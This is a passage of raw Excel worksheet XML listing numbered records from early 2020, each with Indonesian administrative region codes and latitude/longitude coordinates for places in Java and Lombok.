      <c r="V465" s="5" t="s">
        <v>14883</v>
      </c>
      <c r="W465" s="5">
        <v>-621281</v>
      </c>
      <c r="X465" t="s">
        <v>18693</v>
      </c>
      <c r="Y465" t="str">
        <f t="shared" si="7"/>
        <v>-6.21281,106.52679</v>
      </c>
    </row>
    <row r="466" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A466">
        <v>102139</v>
      </c>
      <c r="B466" s="1">
        <v>43864</v>
      </c>
      <c r="C466">
        <v>1</v>
      </c>
      <c r="D466" t="s">
        <v>22</v>
      </c>
      <c r="E466" t="s">
        <v>23</v>
      </c>
      <c r="F466" t="s">
        <v>2092</v>
      </c>
      <c r="G466" t="s">
        <v>2093</v>
      </c>
      <c r="H466" t="s">
        <v>26</v>
      </c>
      <c r="I466" t="s">
        <v>166</v>
      </c>
      <c r="J466" t="s">
        <v>37</v>
      </c>
      <c r="L466" t="s">
        <v>2094</v>
      </c>
      <c r="M466">
        <v>3671031011</v>
      </c>
      <c r="N466">
        <v>3671031</v>
      </c>
      <c r="O466">
        <v>3671</v>
      </c>
      <c r="P466">
        <v>36</v>
      </c>
      <c r="Q466" t="s">
        <v>2095</v>
      </c>
      <c r="R466" t="s">
        <v>738</v>
      </c>
      <c r="S466" t="s">
        <v>201</v>
      </c>
      <c r="T466" t="s">
        <v>171</v>
      </c>
      <c r="U466" s="5">
        <v>10662721</v>
      </c>
      <c r="V466" s="5" t="s">
        <v>14884</v>
      </c>
      <c r="W466" s="5">
        <v>-617264</v>
      </c>
      <c r="X466" t="s">
        <v>18694</v>
      </c>
      <c r="Y466" t="str">
        <f t="shared" si="7"/>
        <v>-6.17264,106.62721</v>
      </c>
    </row>
    <row r="467" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A467">
        <v>102140</v>
      </c>
      <c r="B467" s="1">
        <v>43864</v>
      </c>
      <c r="C467">
        <v>1</v>
      </c>
      <c r="D467" t="s">
        <v>22</v>
      </c>
      <c r="E467" t="s">
        <v>23</v>
      </c>
      <c r="F467" t="s">
        <v>2096</v>
      </c>
      <c r="H467" t="s">
        <v>26</v>
      </c>
      <c r="I467" t="s">
        <v>65</v>
      </c>
      <c r="J467" t="s">
        <v>37</v>
      </c>
      <c r="L467" t="s">
        <v>2097</v>
      </c>
      <c r="M467">
        <v>3216082008</v>
      </c>
      <c r="N467">
        <v>3216082</v>
      </c>
      <c r="O467">
        <v>3216</v>
      </c>
      <c r="P467">
        <v>32</v>
      </c>
      <c r="Q467" t="s">
        <v>2098</v>
      </c>
      <c r="R467" t="s">
        <v>601</v>
      </c>
      <c r="S467" t="s">
        <v>41</v>
      </c>
      <c r="T467" t="s">
        <v>42</v>
      </c>
      <c r="U467" s="5">
        <v>10708222</v>
      </c>
      <c r="V467" s="5" t="s">
        <v>14885</v>
      </c>
      <c r="W467" s="5">
        <v>-617603</v>
      </c>
      <c r="X467" t="s">
        <v>18695</v>
      </c>
      <c r="Y467" t="str">
        <f t="shared" si="7"/>
        <v>-6.17603,107.08222</v>
      </c>
    </row>
    <row r="468" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A468">
        <v>102141</v>
      </c>
      <c r="B468" s="1">
        <v>43865</v>
      </c>
      <c r="C468">
        <v>0</v>
      </c>
      <c r="D468" t="s">
        <v>22</v>
      </c>
      <c r="E468" t="s">
        <v>23</v>
      </c>
      <c r="F468" t="s">
        <v>2099</v>
      </c>
      <c r="H468" t="s">
        <v>26</v>
      </c>
      <c r="I468" t="s">
        <v>1359</v>
      </c>
      <c r="J468" t="s">
        <v>37</v>
      </c>
      <c r="L468" t="s">
        <v>2100</v>
      </c>
      <c r="M468">
        <v>3671042002</v>
      </c>
      <c r="N468">
        <v>3671042</v>
      </c>
      <c r="O468">
        <v>3671</v>
      </c>
      <c r="P468">
        <v>36</v>
      </c>
      <c r="Q468" t="s">
        <v>2101</v>
      </c>
      <c r="R468" t="s">
        <v>2102</v>
      </c>
      <c r="S468" t="s">
        <v>201</v>
      </c>
      <c r="T468" t="s">
        <v>171</v>
      </c>
      <c r="U468" s="5">
        <v>10658811</v>
      </c>
      <c r="V468" s="5" t="s">
        <v>14886</v>
      </c>
      <c r="W468" s="5">
        <v>-616756</v>
      </c>
      <c r="X468" t="s">
        <v>18696</v>
      </c>
      <c r="Y468" t="str">
        <f t="shared" si="7"/>
        <v>-6.16756,106.58811</v>
      </c>
    </row>
    <row r="469" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A469">
        <v>102142</v>
      </c>
      <c r="B469" s="1">
        <v>43865</v>
      </c>
      <c r="C469">
        <v>0</v>
      </c>
      <c r="D469" t="s">
        <v>22</v>
      </c>
      <c r="E469" t="s">
        <v>23</v>
      </c>
      <c r="F469" t="s">
        <v>2103</v>
      </c>
      <c r="H469" t="s">
        <v>26</v>
      </c>
      <c r="I469" t="s">
        <v>2104</v>
      </c>
      <c r="J469" t="s">
        <v>2105</v>
      </c>
      <c r="L469" t="s">
        <v>2106</v>
      </c>
      <c r="M469">
        <v>3172030001</v>
      </c>
      <c r="N469">
        <v>3172030</v>
      </c>
      <c r="O469">
        <v>3172</v>
      </c>
      <c r="P469">
        <v>31</v>
      </c>
      <c r="Q469" t="s">
        <v>2107</v>
      </c>
      <c r="R469" t="s">
        <v>228</v>
      </c>
      <c r="S469" t="s">
        <v>49</v>
      </c>
      <c r="T469" t="s">
        <v>33</v>
      </c>
      <c r="U469" s="5">
        <v>10690942</v>
      </c>
      <c r="V469" s="5" t="s">
        <v>14887</v>
      </c>
      <c r="W469" s="5">
        <v>-634316</v>
      </c>
      <c r="X469" t="s">
        <v>18697</v>
      </c>
      <c r="Y469" t="str">
        <f t="shared" si="7"/>
        <v>-6.34316,106.90942</v>
      </c>
    </row>
    <row r="470" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A470">
        <v>102146</v>
      </c>
      <c r="B470" s="1">
        <v>43865</v>
      </c>
      <c r="C470">
        <v>0</v>
      </c>
      <c r="D470" t="s">
        <v>22</v>
      </c>
      <c r="E470" t="s">
        <v>23</v>
      </c>
      <c r="F470" t="s">
        <v>2108</v>
      </c>
      <c r="G470" t="s">
        <v>2109</v>
      </c>
      <c r="H470" t="s">
        <v>26</v>
      </c>
      <c r="I470" t="s">
        <v>2110</v>
      </c>
      <c r="J470" t="s">
        <v>1532</v>
      </c>
      <c r="L470" t="s">
        <v>2111</v>
      </c>
      <c r="M470">
        <v>3172030002</v>
      </c>
      <c r="N470">
        <v>3172030</v>
      </c>
      <c r="O470">
        <v>3172</v>
      </c>
      <c r="P470">
        <v>31</v>
      </c>
      <c r="Q470" t="s">
        <v>1534</v>
      </c>
      <c r="R470" t="s">
        <v>228</v>
      </c>
      <c r="S470" t="s">
        <v>49</v>
      </c>
      <c r="T470" t="s">
        <v>33</v>
      </c>
      <c r="U470" s="5">
        <v>10691180</v>
      </c>
      <c r="V470" s="5" t="s">
        <v>14888</v>
      </c>
      <c r="W470" s="5">
        <v>-633565</v>
      </c>
      <c r="X470" t="s">
        <v>18698</v>
      </c>
      <c r="Y470" t="str">
        <f t="shared" si="7"/>
        <v>-6.33565,106.91180</v>
      </c>
    </row>
    <row r="471" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A471">
        <v>102149</v>
      </c>
      <c r="B471" s="1">
        <v>43865</v>
      </c>
      <c r="C471">
        <v>0</v>
      </c>
      <c r="D471" t="s">
        <v>22</v>
      </c>
      <c r="E471" t="s">
        <v>23</v>
      </c>
      <c r="F471" t="s">
        <v>2112</v>
      </c>
      <c r="G471" t="s">
        <v>2113</v>
      </c>
      <c r="H471" t="s">
        <v>26</v>
      </c>
      <c r="I471" t="s">
        <v>2114</v>
      </c>
      <c r="J471" t="s">
        <v>1532</v>
      </c>
      <c r="L471" t="s">
        <v>2115</v>
      </c>
      <c r="M471">
        <v>3172030002</v>
      </c>
      <c r="N471">
        <v>3172030</v>
      </c>
      <c r="O471">
        <v>3172</v>
      </c>
      <c r="P471">
        <v>31</v>
      </c>
      <c r="Q471" t="s">
        <v>1534</v>
      </c>
      <c r="R471" t="s">
        <v>228</v>
      </c>
      <c r="S471" t="s">
        <v>49</v>
      </c>
      <c r="T471" t="s">
        <v>33</v>
      </c>
      <c r="U471" s="5">
        <v>10691031</v>
      </c>
      <c r="V471" s="5" t="s">
        <v>14809</v>
      </c>
      <c r="W471" s="5">
        <v>-633578</v>
      </c>
      <c r="X471" t="s">
        <v>18699</v>
      </c>
      <c r="Y471" t="str">
        <f t="shared" si="7"/>
        <v>-6.33578,106.91031</v>
      </c>
    </row>
    <row r="472" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A472">
        <v>102152</v>
      </c>
      <c r="B472" s="1">
        <v>43865</v>
      </c>
      <c r="C472">
        <v>0</v>
      </c>
      <c r="D472" t="s">
        <v>22</v>
      </c>
      <c r="E472" t="s">
        <v>23</v>
      </c>
      <c r="F472" t="s">
        <v>2116</v>
      </c>
      <c r="G472" t="s">
        <v>2117</v>
      </c>
      <c r="H472" t="s">
        <v>26</v>
      </c>
      <c r="I472" t="s">
        <v>65</v>
      </c>
      <c r="J472" t="s">
        <v>2118</v>
      </c>
      <c r="M472">
        <v>3374160010</v>
      </c>
      <c r="N472">
        <v>3374160</v>
      </c>
      <c r="O472">
        <v>3374</v>
      </c>
      <c r="P472">
        <v>33</v>
      </c>
      <c r="Q472" t="s">
        <v>2119</v>
      </c>
      <c r="R472" t="s">
        <v>2120</v>
      </c>
      <c r="S472" t="s">
        <v>1334</v>
      </c>
      <c r="T472" t="s">
        <v>1134</v>
      </c>
      <c r="U472" s="5">
        <v>11030955</v>
      </c>
      <c r="V472" s="5" t="s">
        <v>14889</v>
      </c>
      <c r="W472" s="5">
        <v>-697279</v>
      </c>
      <c r="X472" t="s">
        <v>18700</v>
      </c>
      <c r="Y472" t="str">
        <f t="shared" si="7"/>
        <v>-6.97279,110.30955</v>
      </c>
    </row>
    <row r="473" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A473">
        <v>102153</v>
      </c>
      <c r="B473" s="1">
        <v>43865</v>
      </c>
      <c r="C473">
        <v>0</v>
      </c>
      <c r="D473" t="s">
        <v>85</v>
      </c>
      <c r="E473" t="s">
        <v>23</v>
      </c>
      <c r="F473" t="s">
        <v>2121</v>
      </c>
      <c r="G473" t="s">
        <v>2122</v>
      </c>
      <c r="H473" t="s">
        <v>26</v>
      </c>
      <c r="J473" t="s">
        <v>1460</v>
      </c>
      <c r="K473" t="s">
        <v>2123</v>
      </c>
      <c r="L473" t="s">
        <v>2124</v>
      </c>
      <c r="M473">
        <v>3204110006</v>
      </c>
      <c r="N473">
        <v>3204110</v>
      </c>
      <c r="O473">
        <v>3204</v>
      </c>
      <c r="P473">
        <v>32</v>
      </c>
      <c r="Q473" t="s">
        <v>2125</v>
      </c>
      <c r="R473" t="s">
        <v>2126</v>
      </c>
      <c r="S473" t="s">
        <v>1464</v>
      </c>
      <c r="T473" t="s">
        <v>42</v>
      </c>
      <c r="U473" s="5">
        <v>10777958</v>
      </c>
      <c r="V473" s="5" t="s">
        <v>14890</v>
      </c>
      <c r="W473" s="5">
        <v>-695856</v>
      </c>
      <c r="X473" t="s">
        <v>18701</v>
      </c>
      <c r="Y473" t="str">
        <f t="shared" si="7"/>
        <v>-6.95856,107.77958</v>
      </c>
    </row>
    <row r="474" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A474">
        <v>102154</v>
      </c>
      <c r="B474" s="1">
        <v>43865</v>
      </c>
      <c r="C474">
        <v>1</v>
      </c>
      <c r="D474" t="s">
        <v>22</v>
      </c>
      <c r="E474" t="s">
        <v>23</v>
      </c>
      <c r="F474" t="s">
        <v>2127</v>
      </c>
      <c r="G474" t="s">
        <v>2128</v>
      </c>
      <c r="H474" t="s">
        <v>26</v>
      </c>
      <c r="I474" t="s">
        <v>523</v>
      </c>
      <c r="J474" t="s">
        <v>1715</v>
      </c>
      <c r="L474" t="s">
        <v>2129</v>
      </c>
      <c r="M474">
        <v>3175010005</v>
      </c>
      <c r="N474">
        <v>3175010</v>
      </c>
      <c r="O474">
        <v>3175</v>
      </c>
      <c r="P474">
        <v>31</v>
      </c>
      <c r="Q474" t="s">
        <v>1686</v>
      </c>
      <c r="R474" t="s">
        <v>546</v>
      </c>
      <c r="S474" t="s">
        <v>547</v>
      </c>
      <c r="T474" t="s">
        <v>33</v>
      </c>
      <c r="U474" s="5">
        <v>10676880</v>
      </c>
      <c r="V474" s="5" t="s">
        <v>14891</v>
      </c>
      <c r="W474" s="5">
        <v>-610817</v>
      </c>
      <c r="X474" t="s">
        <v>18702</v>
      </c>
      <c r="Y474" t="str">
        <f t="shared" si="7"/>
        <v>-6.10817,106.76880</v>
      </c>
    </row>
    <row r="475" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A475">
        <v>102192</v>
      </c>
      <c r="B475" s="1">
        <v>43867</v>
      </c>
      <c r="C475">
        <v>0</v>
      </c>
      <c r="D475" t="s">
        <v>22</v>
      </c>
      <c r="E475" t="s">
        <v>23</v>
      </c>
      <c r="F475" t="s">
        <v>2130</v>
      </c>
      <c r="H475" t="s">
        <v>26</v>
      </c>
      <c r="I475" t="s">
        <v>1439</v>
      </c>
      <c r="J475" t="s">
        <v>1342</v>
      </c>
      <c r="L475" t="s">
        <v>2131</v>
      </c>
      <c r="M475">
        <v>3578040002</v>
      </c>
      <c r="N475">
        <v>3578040</v>
      </c>
      <c r="O475">
        <v>3578</v>
      </c>
      <c r="P475">
        <v>35</v>
      </c>
      <c r="Q475" t="s">
        <v>1887</v>
      </c>
      <c r="R475" t="s">
        <v>1888</v>
      </c>
      <c r="S475" t="s">
        <v>1346</v>
      </c>
      <c r="T475" t="s">
        <v>1221</v>
      </c>
      <c r="U475" s="5">
        <v>11273586</v>
      </c>
      <c r="V475" s="5" t="s">
        <v>14892</v>
      </c>
      <c r="W475" s="5">
        <v>-732717</v>
      </c>
      <c r="X475" t="s">
        <v>18703</v>
      </c>
      <c r="Y475" t="str">
        <f t="shared" si="7"/>
        <v>-7.32717,112.73586</v>
      </c>
    </row>
    <row r="476" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A476">
        <v>102193</v>
      </c>
      <c r="B476" s="1">
        <v>43867</v>
      </c>
      <c r="C476">
        <v>0</v>
      </c>
      <c r="D476" t="s">
        <v>22</v>
      </c>
      <c r="E476" t="s">
        <v>23</v>
      </c>
      <c r="F476" t="s">
        <v>2132</v>
      </c>
      <c r="G476" t="s">
        <v>2133</v>
      </c>
      <c r="H476" t="s">
        <v>26</v>
      </c>
      <c r="I476" t="s">
        <v>2134</v>
      </c>
      <c r="J476" t="s">
        <v>1460</v>
      </c>
      <c r="L476" t="s">
        <v>2135</v>
      </c>
      <c r="M476">
        <v>3273170002</v>
      </c>
      <c r="N476">
        <v>3273170</v>
      </c>
      <c r="O476">
        <v>3273</v>
      </c>
      <c r="P476">
        <v>32</v>
      </c>
      <c r="Q476" t="s">
        <v>2136</v>
      </c>
      <c r="R476" t="s">
        <v>1899</v>
      </c>
      <c r="S476" t="s">
        <v>1464</v>
      </c>
      <c r="T476" t="s">
        <v>42</v>
      </c>
      <c r="U476" s="5">
        <v>10761932</v>
      </c>
      <c r="V476" s="5" t="s">
        <v>14835</v>
      </c>
      <c r="W476" s="5">
        <v>-691825</v>
      </c>
      <c r="X476" t="s">
        <v>18704</v>
      </c>
      <c r="Y476" t="str">
        <f t="shared" si="7"/>
        <v>-6.91825,107.61932</v>
      </c>
    </row>
    <row r="477" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A477">
        <v>102197</v>
      </c>
      <c r="B477" s="1">
        <v>43867</v>
      </c>
      <c r="C477">
        <v>0</v>
      </c>
      <c r="D477" t="s">
        <v>22</v>
      </c>
      <c r="E477" t="s">
        <v>23</v>
      </c>
      <c r="F477" t="s">
        <v>2137</v>
      </c>
      <c r="G477" t="s">
        <v>2138</v>
      </c>
      <c r="H477" t="s">
        <v>26</v>
      </c>
      <c r="I477" t="s">
        <v>2139</v>
      </c>
      <c r="J477" t="s">
        <v>2140</v>
      </c>
      <c r="L477" t="s">
        <v>2141</v>
      </c>
      <c r="M477">
        <v>3171070002</v>
      </c>
      <c r="N477">
        <v>3171070</v>
      </c>
      <c r="O477">
        <v>3171</v>
      </c>
      <c r="P477">
        <v>31</v>
      </c>
      <c r="Q477" t="s">
        <v>2142</v>
      </c>
      <c r="R477" t="s">
        <v>121</v>
      </c>
      <c r="S477" t="s">
        <v>108</v>
      </c>
      <c r="T477" t="s">
        <v>33</v>
      </c>
      <c r="U477" s="5">
        <v>10681906</v>
      </c>
      <c r="V477" s="5" t="s">
        <v>14893</v>
      </c>
      <c r="W477" s="5">
        <v>-625254</v>
      </c>
      <c r="X477" t="s">
        <v>18705</v>
      </c>
      <c r="Y477" t="str">
        <f t="shared" si="7"/>
        <v>-6.25254,106.81906</v>
      </c>
    </row>
    <row r="478" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A478">
        <v>102198</v>
      </c>
      <c r="B478" s="1">
        <v>43867</v>
      </c>
      <c r="C478">
        <v>0</v>
      </c>
      <c r="D478" t="s">
        <v>22</v>
      </c>
      <c r="E478" t="s">
        <v>23</v>
      </c>
      <c r="F478" t="s">
        <v>2143</v>
      </c>
      <c r="G478" t="s">
        <v>2144</v>
      </c>
      <c r="H478" t="s">
        <v>26</v>
      </c>
      <c r="I478" t="s">
        <v>1991</v>
      </c>
      <c r="J478" t="s">
        <v>37</v>
      </c>
      <c r="L478" t="s">
        <v>2145</v>
      </c>
      <c r="M478">
        <v>3201220014</v>
      </c>
      <c r="N478">
        <v>3201220</v>
      </c>
      <c r="O478">
        <v>3201</v>
      </c>
      <c r="P478">
        <v>32</v>
      </c>
      <c r="Q478" t="s">
        <v>2146</v>
      </c>
      <c r="R478" t="s">
        <v>2147</v>
      </c>
      <c r="S478" t="s">
        <v>421</v>
      </c>
      <c r="T478" t="s">
        <v>42</v>
      </c>
      <c r="U478" s="5">
        <v>10679880</v>
      </c>
      <c r="V478" s="5" t="s">
        <v>14894</v>
      </c>
      <c r="W478" s="5">
        <v>-645461</v>
      </c>
      <c r="X478" t="s">
        <v>18706</v>
      </c>
      <c r="Y478" t="str">
        <f t="shared" si="7"/>
        <v>-6.45461,106.79880</v>
      </c>
    </row>
    <row r="479" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A479">
        <v>102200</v>
      </c>
      <c r="B479" s="1">
        <v>43867</v>
      </c>
      <c r="C479">
        <v>1</v>
      </c>
      <c r="D479" t="s">
        <v>22</v>
      </c>
      <c r="E479" t="s">
        <v>23</v>
      </c>
      <c r="F479" t="s">
        <v>2148</v>
      </c>
      <c r="G479" t="s">
        <v>2149</v>
      </c>
      <c r="H479" t="s">
        <v>26</v>
      </c>
      <c r="I479" t="s">
        <v>166</v>
      </c>
      <c r="J479" t="s">
        <v>1128</v>
      </c>
      <c r="L479" t="s">
        <v>2150</v>
      </c>
      <c r="M479">
        <v>5271011001</v>
      </c>
      <c r="N479">
        <v>5271011</v>
      </c>
      <c r="O479">
        <v>5271</v>
      </c>
      <c r="P479">
        <v>52</v>
      </c>
      <c r="Q479" t="s">
        <v>2151</v>
      </c>
      <c r="R479" t="s">
        <v>2152</v>
      </c>
      <c r="S479" t="s">
        <v>2153</v>
      </c>
      <c r="T479" t="s">
        <v>2154</v>
      </c>
      <c r="U479" s="5">
        <v>11608885</v>
      </c>
      <c r="V479" s="5" t="s">
        <v>14895</v>
      </c>
      <c r="W479" s="5">
        <v>-861927</v>
      </c>
      <c r="X479" t="s">
        <v>18707</v>
      </c>
      <c r="Y479" t="str">
        <f t="shared" si="7"/>
        <v>-8.61927,116.08885</v>
      </c>
    </row>
    <row r="480" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A480">
        <v>102202</v>
      </c>
      <c r="B480" s="1">
        <v>43868</v>
      </c>
      <c r="C480">
        <v>0</v>
      </c>
      <c r="D480" t="s">
        <v>22</v>
      </c>
      <c r="E480" t="s">
        <v>23</v>
      </c>
      <c r="F480" t="s">
        <v>2155</v>
      </c>
      <c r="G480" t="s">
        <v>2156</v>
      </c>
      <c r="H480" t="s">
        <v>26</v>
      </c>
      <c r="I480" t="s">
        <v>1359</v>
      </c>
      <c r="J480" t="s">
        <v>1440</v>
      </c>
      <c r="M480">
        <v>3172100006</v>
      </c>
      <c r="N480">
        <v>3172100</v>
      </c>
      <c r="O480">
        <v>3172</v>
      </c>
      <c r="P480">
        <v>31</v>
      </c>
      <c r="Q480" t="s">
        <v>1435</v>
      </c>
      <c r="R480" t="s">
        <v>1436</v>
      </c>
      <c r="S480" t="s">
        <v>49</v>
      </c>
      <c r="T480" t="s">
        <v>33</v>
      </c>
      <c r="U480" s="5">
        <v>10686871</v>
      </c>
      <c r="V480" s="5" t="s">
        <v>14896</v>
      </c>
      <c r="W480" s="5">
        <v>-619322</v>
      </c>
      <c r="X480" t="s">
        <v>18708</v>
      </c>
      <c r="Y480" t="str">
        <f t="shared" si="7"/>
        <v>-6.19322,106.86871</v>
      </c>
    </row>
    <row r="481" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A481">
        <v>102203</v>
      </c>
      <c r="B481" s="1">
        <v>43868</v>
      </c>
      <c r="C481">
        <v>0</v>
      </c>
      <c r="D481" t="s">
        <v>22</v>
      </c>
      <c r="E481" t="s">
        <v>23</v>
      </c>
      <c r="F481" t="s">
        <v>2157</v>
      </c>
      <c r="G481" t="s">
        <v>2158</v>
      </c>
      <c r="H481" t="s">
        <v>26</v>
      </c>
      <c r="I481" t="s">
        <v>166</v>
      </c>
      <c r="J481" t="s">
        <v>1460</v>
      </c>
      <c r="L481" t="s">
        <v>2159</v>
      </c>
      <c r="M481">
        <v>3204110005</v>
      </c>
      <c r="N481">
        <v>3204110</v>
      </c>
      <c r="O481">
        <v>3204</v>
      </c>
      <c r="P481">
        <v>32</v>
      </c>
      <c r="Q481" t="s">
        <v>2160</v>
      </c>
      <c r="R481" t="s">
        <v>2126</v>
      </c>
      <c r="S481" t="s">
        <v>1464</v>
      </c>
      <c r="T481" t="s">
        <v>42</v>
      </c>
      <c r="U481" s="5">
        <v>10776791</v>
      </c>
      <c r="V481" s="5" t="s">
        <v>14897</v>
      </c>
      <c r="W481" s="5">
        <v>-695728</v>
      </c>
      <c r="X481" t="s">
        <v>18709</v>
      </c>
      <c r="Y481" t="str">
        <f t="shared" si="7"/>
        <v>-6.95728,107.76791</v>
      </c>
    </row>
    <row r="482" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A482">
        <v>102204</v>
      </c>
      <c r="B482" s="1">
        <v>43868</v>
      </c>
      <c r="C482">
        <v>1</v>
      </c>
      <c r="D482" t="s">
        <v>22</v>
      </c>
      <c r="E482" t="s">
        <v>23</v>
      </c>
      <c r="F482" t="s">
        <v>2161</v>
      </c>
      <c r="G482" t="s">
        <v>2162</v>
      </c>
      <c r="H482" t="s">
        <v>26</v>
      </c>
      <c r="I482" t="s">
        <v>882</v>
      </c>
      <c r="J482" t="s">
        <v>1460</v>
      </c>
      <c r="M482">
        <v>3204110014</v>
      </c>
      <c r="N482">
        <v>3204110</v>
      </c>
      <c r="O482">
        <v>3204</v>
      </c>
      <c r="P482">
        <v>32</v>
      </c>
      <c r="Q482" t="s">
        <v>2163</v>
      </c>
      <c r="R482" t="s">
        <v>2126</v>
      </c>
      <c r="S482" t="s">
        <v>1464</v>
      </c>
      <c r="T482" t="s">
        <v>42</v>
      </c>
      <c r="U482" s="5">
        <v>10775306</v>
      </c>
      <c r="V482" s="5" t="s">
        <v>14898</v>
      </c>
      <c r="W482" s="5">
        <v>-697746</v>
      </c>
      <c r="X482" t="s">
        <v>18710</v>
      </c>
      <c r="Y482" t="str">
        <f t="shared" si="7"/>
        <v>-6.97746,107.75306</v>
      </c>
    </row>
    <row r="483" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A483">
        <v>102205</v>
      </c>
      <c r="B483" s="1">
        <v>43868</v>
      </c>
      <c r="C483">
        <v>1</v>
      </c>
      <c r="D483" t="s">
        <v>22</v>
      </c>
      <c r="E483" t="s">
        <v>23</v>
      </c>
      <c r="F483" t="s">
        <v>2164</v>
      </c>
      <c r="H483" t="s">
        <v>26</v>
      </c>
      <c r="I483" t="s">
        <v>2165</v>
      </c>
      <c r="J483" t="s">
        <v>1460</v>
      </c>
      <c r="L483" t="s">
        <v>250</v>
      </c>
      <c r="M483">
        <v>3204110005</v>
      </c>
      <c r="N483">
        <v>3204110</v>
      </c>
      <c r="O483">
        <v>3204</v>
      </c>
      <c r="P483">
        <v>32</v>
      </c>
      <c r="Q483" t="s">
        <v>2160</v>
      </c>
      <c r="R483" t="s">
        <v>2126</v>
      </c>
      <c r="S483" t="s">
        <v>1464</v>
      </c>
      <c r="T483" t="s">
        <v>42</v>
      </c>
      <c r="U483" s="5">
        <v>10775524</v>
      </c>
      <c r="V483" s="5" t="s">
        <v>14899</v>
      </c>
      <c r="W483" s="5">
        <v>-697952</v>
      </c>
      <c r="X483" t="s">
        <v>18711</v>
      </c>
      <c r="Y483" t="str">
        <f t="shared" si="7"/>
        <v>-6.97952,107.75524</v>
      </c>
    </row>
    <row r="484" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A484">
        <v>102206</v>
      </c>
      <c r="B484" s="1">
        <v>43868</v>
      </c>
      <c r="C484">
        <v>1</v>
      </c>
      <c r="D484" t="s">
        <v>22</v>
      </c>
      <c r="E484" t="s">
        <v>23</v>
      </c>
      <c r="F484" t="s">
        <v>2166</v>
      </c>
      <c r="G484" t="s">
        <v>2167</v>
      </c>
      <c r="H484" t="s">
        <v>26</v>
      </c>
      <c r="I484" t="s">
        <v>517</v>
      </c>
      <c r="J484" t="s">
        <v>1460</v>
      </c>
      <c r="L484" t="s">
        <v>2168</v>
      </c>
      <c r="M484">
        <v>3204290002</v>
      </c>
      <c r="N484">
        <v>3204290</v>
      </c>
      <c r="O484">
        <v>3204</v>
      </c>
      <c r="P484">
        <v>32</v>
      </c>
      <c r="Q484" t="s">
        <v>2169</v>
      </c>
      <c r="R484" t="s">
        <v>2170</v>
      </c>
      <c r="S484" t="s">
        <v>1464</v>
      </c>
      <c r="T484" t="s">
        <v>42</v>
      </c>
      <c r="U484" s="5">
        <v>10773146</v>
      </c>
      <c r="V484" s="5" t="s">
        <v>14900</v>
      </c>
      <c r="W484" s="5">
        <v>-694389</v>
      </c>
      <c r="X484" t="s">
        <v>18712</v>
      </c>
      <c r="Y484" t="str">
        <f t="shared" si="7"/>
        <v>-6.94389,107.73146</v>
      </c>
    </row>
    <row r="485" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A485">
        <v>102207</v>
      </c>
      <c r="B485" s="1">
        <v>43868</v>
      </c>
      <c r="C485">
        <v>1</v>
      </c>
      <c r="D485" t="s">
        <v>22</v>
      </c>
      <c r="E485" t="s">
        <v>23</v>
      </c>
      <c r="F485" t="s">
        <v>2171</v>
      </c>
      <c r="G485" t="s">
        <v>2172</v>
      </c>
      <c r="H485" t="s">
        <v>26</v>
      </c>
      <c r="I485" t="s">
        <v>166</v>
      </c>
      <c r="J485" t="s">
        <v>1460</v>
      </c>
      <c r="L485" t="s">
        <v>2173</v>
      </c>
      <c r="M485">
        <v>3204110005</v>
      </c>
      <c r="N485">
        <v>3204110</v>
      </c>
      <c r="O485">
        <v>3204</v>
      </c>
      <c r="P485">
        <v>32</v>
      </c>
      <c r="Q485" t="s">
        <v>2160</v>
      </c>
      <c r="R485" t="s">
        <v>2126</v>
      </c>
      <c r="S485" t="s">
        <v>1464</v>
      </c>
      <c r="T485" t="s">
        <v>42</v>
      </c>
      <c r="U485" s="5">
        <v>10776725</v>
      </c>
      <c r="V485" s="5" t="s">
        <v>14901</v>
      </c>
      <c r="W485" s="5">
        <v>-695732</v>
      </c>
      <c r="X485" t="s">
        <v>18713</v>
      </c>
      <c r="Y485" t="str">
        <f t="shared" si="7"/>
        <v>-6.95732,107.76725</v>
      </c>
    </row>
    <row r="486" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A486">
        <v>102208</v>
      </c>
      <c r="B486" s="1">
        <v>43868</v>
      </c>
      <c r="C486">
        <v>1</v>
      </c>
      <c r="D486" t="s">
        <v>22</v>
      </c>
      <c r="E486" t="s">
        <v>23</v>
      </c>
      <c r="F486" t="s">
        <v>2174</v>
      </c>
      <c r="H486" t="s">
        <v>26</v>
      </c>
      <c r="I486" t="s">
        <v>2175</v>
      </c>
      <c r="J486" t="s">
        <v>2176</v>
      </c>
      <c r="L486" t="s">
        <v>2177</v>
      </c>
      <c r="M486">
        <v>3172050006</v>
      </c>
      <c r="N486">
        <v>3172050</v>
      </c>
      <c r="O486">
        <v>3172</v>
      </c>
      <c r="P486">
        <v>31</v>
      </c>
      <c r="Q486" t="s">
        <v>357</v>
      </c>
      <c r="R486" t="s">
        <v>358</v>
      </c>
      <c r="S486" t="s">
        <v>49</v>
      </c>
      <c r="T486" t="s">
        <v>33</v>
      </c>
      <c r="U486" s="5">
        <v>10686134</v>
      </c>
      <c r="V486" s="5" t="s">
        <v>14902</v>
      </c>
      <c r="W486" s="5">
        <v>-626081</v>
      </c>
      <c r="X486" t="s">
        <v>18714</v>
      </c>
      <c r="Y486" t="str">
        <f t="shared" si="7"/>
        <v>-6.26081,106.86134</v>
      </c>
    </row>
    <row r="487" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A487">
        <v>102209</v>
      </c>
      <c r="B487" s="1">
        <v>43868</v>
      </c>
      <c r="C487">
        <v>1</v>
      </c>
      <c r="D487" t="s">
        <v>22</v>
      </c>
      <c r="E487" t="s">
        <v>23</v>
      </c>
      <c r="F487" t="s">
        <v>2178</v>
      </c>
      <c r="G487" t="s">
